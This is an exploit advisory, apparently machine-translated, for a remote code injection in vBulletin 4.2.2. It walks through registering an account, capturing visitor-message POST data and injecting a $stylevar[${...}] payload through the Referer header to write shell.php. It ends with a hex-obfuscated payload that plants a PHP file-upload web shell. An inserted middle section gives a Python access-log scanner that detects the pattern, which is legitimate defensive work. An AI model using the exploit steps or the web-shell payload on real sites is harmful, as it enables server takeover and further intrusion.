Version translated into Turkish with Google Translate
Exploit Title: vBulletin 4.xx 'visitormessage.php' Remote Code Injection Vulnerability
Discovered by: Dariush Nasirpour (Net.Edit0r)
Vendor Website: vBulletin.com
Tested on: [vBulletin 4.2.2]
Remote Code Injection:
1) Register at http://www.victim.com/register.php; in this example the account is: [blackhat]
2) Go to the user's profile page, for example: [Iranian Black Hat Hackers Security Team - security training and ways to counter hacking] (link title only; the URL itself is not preserved)
3) With Live HTTP Headers open, post a visitor message and capture the POST data, which looks like this
[ example ]: message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
4) Change the message from "For-Test-Sample" to something else, e.g. "ALEEEEEEEEX" [because vBulletin does not allow the same comment to be posted twice in a row]
[Now post this with Hackbar:]
URL:
[Iranian Black Hat Hackers Security Team - security training and ways to counter hacking] (link title only; the URL itself is not preserved)
[ Post data ]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
[ And the referer data: ]
PoC: http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell] ")}}] "
5) Open Hackbar and Tamper Data:
The referer data gets URL-encoded by the browser, so you have to replace it again in Tamper Data with the raw value: ] can upload shell ")}}]" and then send the request.
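The injection above travels in the Referer header (and, in the second variant below, in the query string) of a request to the member profile page: an `$stylevar[...]` index whose contents open a PHP `${...}` expression, which the vulnerable template code then evaluates. That shape is a useful indicator for defenders, because the Referer and request URI are both recorded in a standard combined-format access log. The following scanner is an added example written for this page, not part of the original advisory; it parses combined-format log lines, URL-decodes the URI and Referer fields (repeatedly, since browsers and proxies may double-encode), and flags any line carrying the `$stylevar[${` pattern. The log lines are constructed for the demonstration, and the regular expression is a heuristic, not a vendor-supplied signature.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format. The referer field is the one the PoC abuses,
# so it is parsed out explicitly rather than treated as opaque trailing text.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicator for the vBulletin 4.x template-variable injection: a $stylevar[...]
# array index whose body immediately opens a PHP "${...}" expression.
STYLEVAR_INJECTION = re.compile(r'\$stylevar\[\s*\$\{', re.IGNORECASE)


def decode_repeatedly(value, rounds=3):
    """URL-decode until the value stops changing (bounded, to avoid pathological input)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return a finding dict for a suspicious line, or None if it is clean/unparseable."""
    m = COMBINED.match(line.rstrip("\n"))
    if not m:
        return None
    hit_fields = []
    for field in ("uri", "referer"):
        if STYLEVAR_INJECTION.search(decode_repeatedly(m.group(field))):
            hit_fields.append(field)
    if not hit_fields:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "uri": m.group("uri"), "fields": hit_fields}


def scan(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in (inspect_line(l) for l in lines) if f]


# Constructed sample log: one benign visitor-message post, one post whose Referer
# carries the URL-encoded injection, and one direct GET with the raw pattern in the URI.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Feb/2015:10:00:01 +0000] "POST /visitormessage.php?do=message&u=110 HTTP/1.1" '
    '200 512 "http://forum.example/members/blackhat.html" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Feb/2015:10:00:05 +0000] "POST /visitormessage.php?do=message&u=110 HTTP/1.1" '
    '200 512 "http://forum.example/members/blackhat.html?a=%24stylevar%5B%24%7B%24%7Bx%7D%7D%5D" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Feb/2015:10:02:11 +0000] "GET /members/blackhat.html?a=$stylevar[${${x}}] HTTP/1.1" '
    '200 2048 "-" "curl/7.40"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f'{finding["ts"]} {finding["ip"]} {finding["uri"]} -> injection in {finding["fields"]}')
```

Run against a real log with `scan(open("access.log"))`. Matching on the decoded value matters: the browser encodes the Referer, as step 5 notes, so a raw-string match on `$stylevar[` would miss the first malicious line entirely.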
vBulletin 4.2.2 Remote Code Injection
?a=$stylevar[${${file_put_contents("shell.php","\x3C\x68\x74\x6D\x6C\x3E\xD\xA\x20\x20\x20\x20\x3C\x62\x6F\x64\x79\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x66\x6F\x72\x6D\x20\x6D\x65\x74\x68\x6F\x64\x3D\x22\x70\x6F\x73\x74\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x22\x20\x65\x6E\x63\x74\x79\x70\x65\x3D\x22\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61\x22\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6C\x61\x62\x65\x6C\x20\x66\x6F\x72\x3D\x22\x66\x69\x6C\x65\x22\x3E\x46\x69\x6C\x65\x6E\x61\x6D\x65\x3A\x3C\x2F\x6C\x61\x62\x65\x6C\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x66\x69\x6C\x65\x22\x20\x6E\x61\x6D\x65\x3D\x22\x66\x69\x6C\x65\x31\x22\x20\x69\x64\x3D\x22\x66\x69\x6C\x65\x31\x22\x20\x2F\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x62\x72\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x73\x75\x62\x6D\x69\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x73\x75\x62\x6D\x69\x74\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x53\x75\x62\x6D\x69\x74\x22\x20\x2F\x3E\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x2F\x66\x6F\x72\x6D\x3E\xD\xA\x20\x20\x20\x20\x3C\x2F\x62\x6F\x64\x79\x3E\xD\xA\x3C\x2F\x68\x74\x6D\x6C\x3E\xD\xA\x3C\x3F\x70\x68\x70\xD\xA\x69\x66\x28\x69\x73\x73\x65\x74\x28\x24\x5F\x50\x4F\x53\x54\x5B\x27\x73\x75\x62\x6D\x69\x74\x27\x5D\x29\x29\x20\x7B\xD\xA\x20\x20\x20\x20\x69\x66\x20\x28\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x65\x72\x72\x6F\x72\x22\x5D\x20\x3E\x20\x30\x29\x20\x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6F\x20\x22\x45\x72\x72\x6F\x72\x3A\x20\x22\x20\x2E\x20\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x65\x72\x72\x6F\x72\x22\x5D\x20\x2E\x20\x22\x3C\x62\x72\x20\x2F\x3E\x22\x3B\xD\xA\x20\x20\x20\x20\x7D\x20\xD\xA\x20\x20\x20\x20\x65\x6C\x73\x65\x20\xD\xA\x20\x20\x20\x20\x7B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x6D\x6F\x76\x65\x5F\x75\x70\x6C\x6F\x61\x64\x65\x64\x5F\x66\x69\x6C\x65\x28\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x74\x6D\x70\x5F\x6E\x61\x6D\x65\x22\x5D\x2C\x67\x65\x74\x63\x77\x64\x28\x29\x2E\x22\x5C\x5C\x22\x2E\x24\x5F\x46\x49\x4C\x45\x53\x5B\x22\x66\x69\x6C\x65\x31\x22\x5D\x5B\x22\x6E\x61\x6D\x65\x22\x5D\x29\x3B\xD\xA\x20\x20\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6F\x20\x22\x75\x70\x6C\x6F\x61\x64\x20\x69\x73\x20\x6F\x6B\x22\x3B\xD\xA\x20\x20\x20\x20\x7D\xD\xA\x7D\xD\xA\x3F\x3E")}}]